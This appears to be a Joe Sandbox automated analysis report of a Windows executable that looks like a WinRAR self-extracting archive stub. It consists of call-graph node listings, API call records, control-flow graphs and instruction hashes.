59a26b 24109->24111 24115 59a27a 24111->24115 24118 59a444 24111->24118 24112 59a27e GetLastError 24112->24115 24113 59b66c 2 API calls 24116 59a254 24113->24116 24115->23993 24116->24112 24117 59a258 CreateDirectoryW 24116->24117 24117->24111 24117->24112 24119 5ae360 24118->24119 24120 59a451 SetFileAttributesW 24119->24120 24121 59a494 24120->24121 24122 59a467 24120->24122 24121->24115 24123 59b66c 2 API calls 24122->24123 24124 59a47b 24123->24124 24124->24121 24125 59a47f SetFileAttributesW 24124->24125 24125->24121 24129 59a194 24126->24129 24130 5ae360 24129->24130 24131 59a1a1 GetFileAttributesW 24130->24131 24132 59a189 24131->24132 24133 59a1b2 24131->24133 24132->24112 24132->24113 24134 59b66c 2 API calls 24133->24134 24135 59a1c6 24134->24135 24135->24132 24136 59a1ca GetFileAttributesW 24135->24136 24136->24132 24138 5aaa40 24137->24138 24139 5aaaf3 ExpandEnvironmentStringsW 24138->24139 24140 5aab16 24138->24140 24139->24140 24140->24011 24141->24011 24142->24011 24143->24031 24144->24011 24145->24011 24146->24011 24148 5b8606 24147->24148 24149 5b861e 24148->24149 24150 5b8613 24148->24150 24152 5b8626 24149->24152 24158 5b862f ___FrameUnwindToState 24149->24158 24151 5b8518 __vswprintf_c_l 21 API calls 24150->24151 24157 5b861b 24151->24157 24153 5b84de _free 20 API calls 24152->24153 24153->24157 24154 5b8659 HeapReAlloc 24154->24157 24154->24158 24155 5b8634 24160 5b895a 20 API calls __dosmaperr 24155->24160 24157->24011 24158->24154 24158->24155 24161 5b71ad 7 API calls 2 library calls 24158->24161 24160->24157 24161->24158 24163 59feba 24162->24163 24191 591789 24163->24191 24165 59fed2 24165->24035 24167 59fead 24166->24167 24168 591789 76 API calls 24167->24168 24169 59fed2 24168->24169 24169->24037 24171 597c72 __EH_prolog 24170->24171 24208 59c827 24171->24208 24173 597c8d 24174 5ae24a new 8 API calls 24173->24174 24175 597cb7 24174->24175 24214 5a440b 24175->24214 24178 597ddf 24179 597de9 24178->24179 24184 597e53 24179->24184 24243 59a4c6 24179->24243 24181 597f06 24181->24041 24182 597ec4 24182->24181 24249 596dc1 74 API calls 24182->24249 24184->24182 24186 59a4c6 8 API calls 24184->24186 24221 59837f 24184->24221 24186->24184 24188 597d09 24187->24188 24189 597d10 24187->24189 24190 5a1acf 84 API calls 24188->24190 24190->24189 24192 59179f 24191->24192 24203 5917fa __vsnwprintf_l 24191->24203 24193 5917c8 24192->24193 24204 596e91 74 API calls __vswprintf_c_l 24192->24204 24194 591827 24193->24194 24195 5917e7 ___std_exception_copy 24193->24195 24197 5b35de 22 API calls 24194->24197 24195->24203 24206 596efd 75 API calls 24195->24206 24199 59182e 24197->24199 24198 5917be 24205 596efd 75 API calls 24198->24205 24199->24203 24207 596efd 75 API calls 24199->24207 24203->24165 24204->24198 24205->24193 24206->24203 24207->24203 24209 59c831 __EH_prolog 24208->24209 24210 5ae24a new 8 API calls 24209->24210 24211 59c874 24210->24211 24212 5ae24a new 8 API calls 24211->24212 24213 59c898 24212->24213 24213->24173 24215 5a4415 __EH_prolog 24214->24215 24216 5ae24a new 8 API calls 24215->24216 24218 5a4431 24216->24218 24217 597ce6 24217->24178 24218->24217 24220 5a06ba 78 API calls 24218->24220 24220->24217 24222 598389 __EH_prolog 24221->24222 24250 591380 24222->24250 24224 5983a4 24258 599ef7 24224->24258 24229 5983cf 24231 5983d3 24229->24231 24240 59a4c6 8 API calls 24229->24240 24241 59846e 24229->24241 24385 59bac4 CompareStringW 24229->24385 24381 591631 24231->24381 24234 5984ce 24284 591f00 24234->24284 24238 5984d9 24238->24231 24288 593aac 24238->24288 24298 59857b 24238->24298 24240->24229 24277 598517 24241->24277 24244 59a4db 24243->24244 24248 59a4df 24244->24248 24619 59a5f4 24244->24619 24246 59a4ef 24247 59a4f4 FindClose 24246->24247 24246->24248 24247->24248 24248->24179 24249->24181 24251 591385 __EH_prolog 24250->24251 24252 59c827 8 API calls 24251->24252 24253 5913bd 24252->24253 24254 5ae24a new 8 API calls 24253->24254 24257 591416 ___scrt_fastfail 24253->24257 24255 591403 24254->24255 24256 59b07d 82 API calls 24255->24256 24255->24257 24256->24257 24257->24224 24259 599f0e 24258->24259 24260 5983ba 24259->24260 24386 596f5d 76 API calls 24259->24386 24260->24231 24262 5919a6 24260->24262 24263 5919b0 __EH_prolog 24262->24263 24270 5919e5 24263->24270 24272 591a00 24263->24272 24387 59709d 24263->24387 24265 591b50 24390 596dc1 74 API calls 24265->24390 24267 593aac 97 API calls 24273 591bb3 24267->24273 24268 591b60 24268->24267 24268->24270 24269 591bff 24269->24270 24275 591c32 24269->24275 24391 596dc1 74 API calls 24269->24391 24270->24229 24272->24265 24272->24268 24272->24270 24273->24269 24274 593aac 97 API calls 24273->24274 24274->24273 24275->24270 24276 593aac 97 API calls 24275->24276 24276->24275 24278 598524 24277->24278 24409 5a0c26 GetSystemTime SystemTimeToFileTime 24278->24409 24280 598488 24280->24234 24281 5a1359 24280->24281 24411 5ad51a 24281->24411 24285 591f05 __EH_prolog 24284->24285 24286 591f39 24285->24286 24419 591951 24285->24419 24286->24238 24289 593ab8 24288->24289 24290 593abc 24288->24290 24289->24238 24291 593ae9 24290->24291 24292 593af7 24290->24292 24293 593b29 24291->24293 24553 593281 85 API calls 3 library calls 24291->24553 24554 5927e8 97 API calls 3 library calls 24292->24554 24293->24238 24296 593af5 24296->24293 24555 59204e 74 API calls 24296->24555 24299 598585 __EH_prolog 24298->24299 24300 5985be 24299->24300 24312 5985c2 24299->24312 24577 5a84bd 99 API calls 24299->24577 24301 5985e7 24300->24301 24305 59867a 24300->24305 24300->24312 24303 598609 24301->24303 24301->24312 24578 597b66 151 API calls 24301->24578 24303->24312 24579 5a84bd 99 API calls 24303->24579 24305->24312 24556 595e3a 24305->24556 24308 598705 24308->24312 24562 59826a 24308->24562 24311 598875 24313 59a4c6 8 API calls 24311->24313 24314 5988e0 24311->24314 24312->24238 24313->24314 24566 597d6c 24314->24566 24316 59c991 80 API calls 24320 59893b _memcmp 24316->24320 24317 598a70 24318 598b43 24317->24318 24325 598abf 24317->24325 24323 598b9e 24318->24323 24335 598b4e 24318->24335 24319 598a69 24582 591f94 74 API calls 24319->24582 24320->24312 24320->24316 24320->24317 24320->24319 24580 598236 82 API calls 24320->24580 24581 591f94 74 API calls 24320->24581 24332 598b30 24323->24332 24585 5980ea 96 API calls 24323->24585 24324 598b9c 24328 599653 79 API calls 24324->24328 24329 59a180 4 API calls 24325->24329 24325->24332 24327 599653 79 API calls 24327->24312 24328->24312 24331 598af7 24329->24331 24330 598c09 24334 599989 GetFileType 24330->24334 24344 598c74 24330->24344 24372 5991c1 __except_handler4 24330->24372 24331->24332 24583 599377 96 API calls 24331->24583 24332->24324 24332->24330 24333 59aa88 8 API calls 24336 598cc3 24333->24336 24338 598c4c 24334->24338 24335->24324 24584 597f26 100 API calls __except_handler4 24335->24584 24340 59aa88 8 API calls 24336->24340 24338->24344 24586 591f94 74 API calls 24338->24586 24357 598cd9 24340->24357 24342 598c62 24587 597061 75 API calls 24342->24587 24344->24333 24345 598efd 24351 598f0f 24345->24351 24352 598f23 24345->24352 24368 598e27 24345->24368 24346 598df7 24348 598e69 24346->24348 24350 598e07 24346->24350 24347 598d9c 24347->24345 24347->24346 24349 59826a CharUpperW 24348->24349 24353 598e84 24349->24353 24354 598e4d 24350->24354 24360 598e15 24350->24360 24355 5992e6 121 API calls 24351->24355 24356 5a2c42 75 API calls 24352->24356 24363 598ead 24353->24363 24364 598eb4 24353->24364 24353->24368 24354->24368 24590 597907 108 API calls 24354->24590 24355->24368 24359 598f3c 24356->24359 24357->24347 24588 599b21 SetFilePointer GetLastError SetEndOfFile 24357->24588 24593 5a28f1 121 API calls 24359->24593 24589 591f94 74 API calls 24360->24589 24591 597698 84 API calls __except_handler4 24363->24591 24592 599224 94 API calls __EH_prolog 24364->24592 24370 59904b 24368->24370 24594 591f94 74 API calls 24368->24594 24371 599156 24370->24371 24370->24372 24374 599104 24370->24374 24595 599ebf SetEndOfFile 24370->24595 24371->24372 24373 59a444 4 API calls 24371->24373 24372->24327 24377 5991b1 24373->24377 24572 599d62 24374->24572 24377->24372 24596 591f94 74 API calls 24377->24596 24378 59914b 24379 5996d0 75 API calls 24378->24379 24379->24371 24382 591643 24381->24382 24611 59c8ca 24382->24611 24385->24229 24386->24260 24392 5916d2 24387->24392 24389 5970b9 24389->24272 24390->24270 24391->24275 24393 5916e8 24392->24393 24404 591740 __vsnwprintf_l 24392->24404 24394 591711 24393->24394 24405 596e91 74 API calls __vswprintf_c_l 24393->24405 24396 591767 24394->24396 24401 59172d ___std_exception_copy 24394->24401 24398 5b35de 22 API calls 24396->24398 24397 591707 24406 596efd 75 API calls 24397->24406 24400 59176e 24398->24400 24400->24404 24408 596efd 75 API calls 24400->24408 24401->24404 24407 596efd 75 API calls 24401->24407 24404->24389 24405->24397 24406->24394 24407->24404 24408->24404 24410 5a0c56 __vswprintf_c_l 24409->24410 24410->24280 24412 5ad527 24411->24412 24413 59ddd1 53 API calls 24412->24413 24414 5ad54a 24413->24414 24415 59400a _swprintf 51 API calls 24414->24415 24416 5ad55c 24415->24416 24417 5acb5a 16 API calls 24416->24417 24418 5a1372 24417->24418 24418->24234 24420 591961 24419->24420 24422 59195d 24419->24422 24423 591896 24420->24423 24422->24286 24424 5918a8 24423->24424 24425 5918e5 24423->24425 24426 593aac 97 API calls 24424->24426 24431 593f18 24425->24431 24429 5918c8 24426->24429 24429->24422 24435 593f21 24431->24435 24432 593aac 97 API calls 24432->24435 24433 591906 24433->24429 24436 591e00 24433->24436 24435->24432 24435->24433 24448 5a067c 24435->24448 24437 591e0a __EH_prolog 24436->24437 24456 593b3d 24437->24456 24439 591e34 24440 5916d2 76 API calls 24439->24440 24442 591ebb 24439->24442 24441 591e4b 24440->24441 24484 591849 76 API calls 24441->24484 24442->24429 24444 591e63 24446 591e6f 24444->24446 24485 5a137a MultiByteToWideChar 24444->24485 24486 591849 76 API calls 24446->24486 24449 5a0683 24448->24449 24452 5a069e 24449->24452 24454 596e8c RaiseException __CxxThrowException@8 24449->24454 24451 5a06af SetThreadExecutionState 24451->24435 24452->24451 24455 596e8c RaiseException __CxxThrowException@8 24452->24455 24454->24452 24455->24451 24457 593b47 __EH_prolog 24456->24457 24458 593b79 24457->24458 24459 593b5d 24457->24459 24460 593dc2 24458->24460 24464 593ba5 24458->24464 24515 596dc1 74 API calls 24459->24515 24532 596dc1 74 API calls 24460->24532 24463 593b68 24463->24439 24464->24463 24487 5a2c42 24464->24487 24466 593c26 24467 593cb1 24466->24467 24483 593c1d 24466->24483 24518 59c991 24466->24518 24500 59aa88 24467->24500 24468 593c22 24468->24466 24517 592034 76 API calls 24468->24517 24469 593c12 24516 596dc1 74 API calls 24469->24516 24470 593bf4 24470->24466 24470->24468 24470->24469 24472 593cc4 24477 593d48 24472->24477 24478 593d3e 24472->24478 24524 5a28f1 121 API calls 24477->24524 24504 5992e6 24478->24504 24481 593d46 24481->24483 24525 591f94 74 API calls 24481->24525 24526 5a1acf 24483->24526 24484->24444 24485->24446 24486->24442 24488 5a2c51 24487->24488 24490 5a2c5b 24487->24490 24533 596efd 75 API calls 24488->24533 24491 5a2ca2 ___std_exception_copy 24490->24491 24494 5a2c9d Concurrency::cancel_current_task 24490->24494 24499 5a2cfd ___scrt_fastfail 24490->24499 24492 5a2da9 Concurrency::cancel_current_task 24491->24492 24493 5a2cd9 24491->24493 24491->24499 24536 5b157a RaiseException 24492->24536 24534 5a2b7b 75 API calls 4 library calls 24493->24534 24535 5b157a RaiseException 24494->24535 24498 5a2dc1 24499->24470 24501 59aa95 24500->24501 24503 59aa9f 24500->24503 24502 5ae24a new 8 API calls 24501->24502 24502->24503 24503->24472 24505 5992f0 __EH_prolog 24504->24505 24537 597dc6 24505->24537 24508 59709d 76 API calls 24509 599302 24508->24509 24540 59ca6c 24509->24540 24511 599314 24512 59935c 24511->24512 24514 59ca6c 114 API calls 24511->24514 24549 59cc51 97 API calls __vsnwprintf_l 24511->24549 24512->24481 24514->24511 24515->24463 24516->24483 24517->24466 24519 59c9b2 24518->24519 24520 59c9c4 24518->24520 24550 596249 80 API calls 24519->24550 24551 596249 80 API calls 24520->24551 24523 59c9bc 24523->24467 24524->24481 24525->24483 24527 5a1ad9 24526->24527 24528 5a1af2 24527->24528 24531 5a1b06 24527->24531 24552 5a075b 84 API calls 24528->24552 24530 5a1af9 24530->24531 24532->24463 24533->24490 24534->24499 24535->24492 24536->24498 24538 59acf5 GetVersionExW 24537->24538 24539 597dcb 24538->24539 24539->24508 24545 59ca82 __vsnwprintf_l 24540->24545 24541 59cbf7 24542 59cc1f 24541->24542 24543 59ca0b 6 API calls 24541->24543 24544 5a067c SetThreadExecutionState RaiseException 24542->24544 24543->24542 24547 59cbee 24544->24547 24545->24541 24546 5a84bd 99 API calls 24545->24546 24545->24547 24548 59ab70 89 API calls 24545->24548 24546->24545 24547->24511 24548->24545 24549->24511 24550->24523 24551->24523 24552->24530 24553->24296 24554->24296 24555->24293 24557 595e4a 24556->24557 24597 595d67 24557->24597 24559 595e7d 24561 595eb5 24559->24561 24602 59ad65 CharUpperW CompareStringW 24559->24602 24561->24308 24563 598289 24562->24563 24608 5a179d CharUpperW 24563->24608 24565 598333 24565->24311 24567 597d7b 24566->24567 24568 597dbb 24567->24568 24609 597043 74 API calls 24567->24609 24568->24320 24570 597db3 24610 596dc1 74 API calls 24570->24610 24573 599d73 24572->24573 24575 599d82 24572->24575 24574 599d79 FlushFileBuffers 24573->24574 24573->24575 24574->24575 24576 599dfb SetFileTime 24575->24576 24576->24378 24577->24300 24578->24303 24579->24312 24580->24320 24581->24320 24582->24317 24583->24332 24584->24324 24585->24332 24586->24342 24587->24344 24588->24347 24589->24368 24590->24368 24591->24368 24592->24368 24593->24368 24594->24370 24595->24374 24596->24372 24603 595c64 24597->24603 24599 595d88 24599->24559 24601 595c64 2 API calls 24601->24599 24602->24559 24604 595c6e 24603->24604 24605 595d56 24604->24605 24607 59ad65 CharUpperW CompareStringW 24604->24607 24605->24599 24605->24601 24607->24604 24608->24565 24609->24570 24610->24568 24612 59c8db 24611->24612 24617 59a90e 84 API calls 24612->24617 24614 59c90d 24618 59a90e 84 API calls 24614->24618 24616 59c918 24617->24614 24618->24616 24620 59a5fe 24619->24620 24621 59a691 FindNextFileW 24620->24621 24622 59a621 FindFirstFileW 24620->24622 24623 59a69c GetLastError 24621->24623 24624 59a6b0 24621->24624 24625 59a638 24622->24625 24630 59a675 24622->24630 24623->24624 24624->24630 24626 59b66c 2 API calls 24625->24626 24627 59a64d 24626->24627 24628 59a66a GetLastError 24627->24628 24629 59a651 FindFirstFileW 24627->24629 24628->24630 24629->24628 24629->24630 24630->24246 24631->24052 24632->24058 24633->24058 24634->24061 24635->24067 24637 599ef7 76 API calls 24636->24637 24638 591f5b 24637->24638 24639 591f78 24638->24639 24640 5919a6 97 API calls 24638->24640 24639->24075 24639->24076 24641 591f68 24640->24641 24641->24639 24643 596dc1 74 API calls 24641->24643 24643->24639 24871 5ab8e0 93 API calls _swprintf 24872 5a8ce0 6 API calls 24876 5c16e0 CloseHandle 24877 59ea98 FreeLibrary 24878 5aa89d 78 API calls 24879 5a7090 114 API calls 24880 5acc90 70 API calls 24923 5aa990 97 API calls 24924 5a9b90 GdipCloneImage GdipAlloc 24650 5ad891 19 API calls ___delayLoadHelper2@8 24925 5b9b90 21 API calls 2 library calls 24926 5b2397 48 API calls 24651 5ad997 24652 5ad89b 24651->24652 24653 5adf59 ___delayLoadHelper2@8 19 API calls 24652->24653 24653->24652 24928 5b5780 QueryPerformanceFrequency QueryPerformanceCounter 24761 591385 82 API calls 3 library calls 24762 5b76bd 24763 5b76e8 24762->24763 24764 5b76cc 24762->24764 24766 5bb290 51 API calls 24763->24766 24764->24763 24765 5b76d2 24764->24765 24785 5b895a 20 API calls __dosmaperr 24765->24785 24768 5b76ef GetModuleFileNameA 24766->24768 24770 5b7713 24768->24770 24769 5b76d7 24786 5b8839 26 API calls ___std_exception_copy 24769->24786 24787 5b77e1 38 API calls 24770->24787 24773 5b7730 24788 5b7956 20 API calls 2 library calls 24773->24788 24775 5b773d 24776 5b7752 24775->24776 24777 5b7746 24775->24777 24790 5b77e1 38 API calls 24776->24790 24789 5b895a 20 API calls __dosmaperr 24777->24789 24780 5b84de _free 20 API calls 24782 5b76e1 24780->24782 24781 5b7768 24783 5b84de _free 20 API calls 24781->24783 24784 5b774b 24781->24784 24783->24784 24784->24780 24785->24769 24786->24782 24787->24773 24788->24775 24789->24784 24790->24781 24884 5916b0 84 API calls 24792 5b90b0 24800 5ba56f 24792->24800 24795 5b90c4 24797 5b90cc 24798 5b90d9 24797->24798 24808 5b90e0 11 API calls 24797->24808 24801 5ba458 pre_c_initialization 5 API calls 24800->24801 24802 5ba596 24801->24802 24803 5ba5ae TlsAlloc 24802->24803 24804 5ba59f 24802->24804 24803->24804 24805 5aec4a TranslatorGuardHandler 5 API calls 24804->24805 24806 5b90ba 24805->24806 24806->24795 24807 5b9029 20 API calls 3 library calls 24806->24807 24807->24797 24808->24795 24809 5ba3b0 24810 5ba3bb 24809->24810 24812 5ba3e4 24810->24812 24813 5ba3e0 24810->24813 24815 5ba6ca 24810->24815 24822 5ba410 DeleteCriticalSection 24812->24822 24816 5ba458 pre_c_initialization 5 API calls 24815->24816 24817 5ba6f1 24816->24817 24818 5ba70f InitializeCriticalSectionAndSpinCount 24817->24818 24819 5ba6fa 24817->24819 24818->24819 24820 5aec4a TranslatorGuardHandler 5 API calls 24819->24820 24821 5ba726 24820->24821 24821->24810 24822->24813 24885 5b1eb0 6 API calls 3 library calls 24931 5b79b7 55 API calls _free 24887 5ae4a2 38 API calls ___FrameUnwindToState 24888 5996a0 79 API calls 24933 5be9a0 51 API calls

                  Control-flow Graph

                  APIs
                    • Part of subcall function 005A00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 005A00E4
                    • Part of subcall function 005A00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005A00F6
                    • Part of subcall function 005A00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005A0127
                    • Part of subcall function 005A9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 005A9DAC
                    • Part of subcall function 005AA335: OleInitialize.OLE32(00000000), ref: 005AA34E
                    • Part of subcall function 005AA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 005AA385
                    • Part of subcall function 005AA335: SHGetMalloc.SHELL32(005D8430), ref: 005AA38F
                    • Part of subcall function 005A13B3: GetCPInfo.KERNEL32(00000000,?), ref: 005A13C4
                    • Part of subcall function 005A13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 005A13D8
                  • GetCommandLineW.KERNEL32 ref: 005AD61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 005AD643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 005AD654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 005AD68E
                    • Part of subcall function 005AD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 005AD29D
                    • Part of subcall function 005AD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 005AD2D9
                  • CloseHandle.KERNEL32(00000000), ref: 005AD697
                  • GetModuleFileNameW.KERNEL32(00000000,005EDC90,00000800), ref: 005AD6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,005EDC90), ref: 005AD6BE
                  • GetLocalTime.KERNEL32(?), ref: 005AD6C9
                  • _swprintf.LIBCMT ref: 005AD708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 005AD71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 005AD721
                  • LoadIconW.USER32(00000000,00000064), ref: 005AD738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 005AD789
                  • Sleep.KERNEL32(?), ref: 005AD7B7
                  • DeleteObject.GDI32 ref: 005AD7F0
                  • DeleteObject.GDI32(?), ref: 005AD800
                  • CloseHandle.KERNEL32 ref: 005AD843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj^
                  • API String ID: 788466649-1924929721
                  • Opcode ID: 9a0022fe6d0383eaf2331d3106dffec32915b9914a62f000aa4e548cd30d104c
                  • Instruction ID: 01e7a11869d9dbe417cfb47c841bdb52a542f2ad63eb742cfa57bb9535a6bbf7
                  • Opcode Fuzzy Hash: 9a0022fe6d0383eaf2331d3106dffec32915b9914a62f000aa4e548cd30d104c
                  • Instruction Fuzzy Hash: 6F61A371900242AFD720ABA5EC4DF2E3FBCFB66744F04042AF54696291DB789908D772

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 770 5a9e1c-5a9e38 FindResourceW 771 5a9e3e-5a9e50 SizeofResource 770->771 772 5a9f2f-5a9f32 770->772 773 5a9e52-5a9e61 LoadResource 771->773 774 5a9e70-5a9e72 771->774 773->774 775 5a9e63-5a9e6e LockResource 773->775 776 5a9f2e 774->776 775->774 777 5a9e77-5a9e8c GlobalAlloc 775->777 776->772 778 5a9f28-5a9f2d 777->778 779 5a9e92-5a9e9b GlobalLock 777->779 778->776 780 5a9f21-5a9f22 GlobalFree 779->780 781 5a9ea1-5a9ebf call 5af4b0 CreateStreamOnHGlobal 779->781 780->778 784 5a9f1a-5a9f1b GlobalUnlock 781->784 785 5a9ec1-5a9ee3 call 5a9d7b 781->785 784->780 785->784 790 5a9ee5-5a9eed 785->790 791 5a9f08-5a9f16 790->791 792 5a9eef-5a9f03 GdipCreateHBITMAPFromBitmap 790->792 791->784 792->791 793 5a9f05 792->793 793->791
                  APIs
                  • FindResourceW.KERNEL32(005AAE4D,PNG,?,?,?,005AAE4D,00000066), ref: 005A9E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,005AAE4D,00000066), ref: 005A9E46
                  • LoadResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E59
                  • LockResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,005AAE4D,00000066), ref: 005A9E82
                  • GlobalLock.KERNEL32(00000000), ref: 005A9E93
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 005A9EB7
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 005A9EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 005A9F1B
                  • GlobalFree.KERNEL32(00000000), ref: 005A9F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                  • String ID: PNG
                  • API String ID: 3656887471-364855578
                  • Opcode ID: 6b6a4c302fd7ec5c0dc97abdeb15580681fbf37fbaa6b758c89d442c25ba837f
                  • Instruction ID: b4674f6569d520bf5bc62a9eb173874164e8bfbf1f4cbf1765d655cafb4dbf47
                  • Opcode Fuzzy Hash: 6b6a4c302fd7ec5c0dc97abdeb15580681fbf37fbaa6b758c89d442c25ba837f
                  • Instruction Fuzzy Hash: 7F31B175204716AFC7119F21DC48E2FBFADFF9A751B044529F902D2260EB32DC04DAA0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 979 59a5f4-59a61f call 5ae360 982 59a691-59a69a FindNextFileW 979->982 983 59a621-59a632 FindFirstFileW 979->983 984 59a69c-59a6aa GetLastError 982->984 985 59a6b0-59a6b2 982->985 986 59a6b8-59a75c call 59fe56 call 59bcfb call 5a0e19 * 3 983->986 987 59a638-59a64f call 59b66c 983->987 984->985 985->986 988 59a761-59a774 985->988 986->988 994 59a66a-59a673 GetLastError 987->994 995 59a651-59a668 FindFirstFileW 987->995 996 59a675-59a678 994->996 997 59a684 994->997 995->986 995->994 996->997 999 59a67a-59a67d 996->999 1000 59a686-59a68c 997->1000 999->997 1002 59a67f-59a682 999->1002 1000->988 1002->1000
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A692
                  • GetLastError.KERNEL32(?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A69E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: dbe8335c8a3624d3c9ec33e0e71b492c3f8145d30a4a4a532cfbd2206265357f
                  • Instruction ID: 7b996bf0c4892299266cf84336c6b27de31d2763115dc3e452bf78fd9ef19e8a
                  • Opcode Fuzzy Hash: dbe8335c8a3624d3c9ec33e0e71b492c3f8145d30a4a4a532cfbd2206265357f
                  • Instruction Fuzzy Hash: 03417672504646AFC724EF68C884ADEFBFCBF99340F044929F599D3240D734A9549BA2
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002,00000000), ref: 005B755E
                  • TerminateProcess.KERNEL32(00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002,00000000), ref: 005B7565
                  • ExitProcess.KERNEL32 ref: 005B7577
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
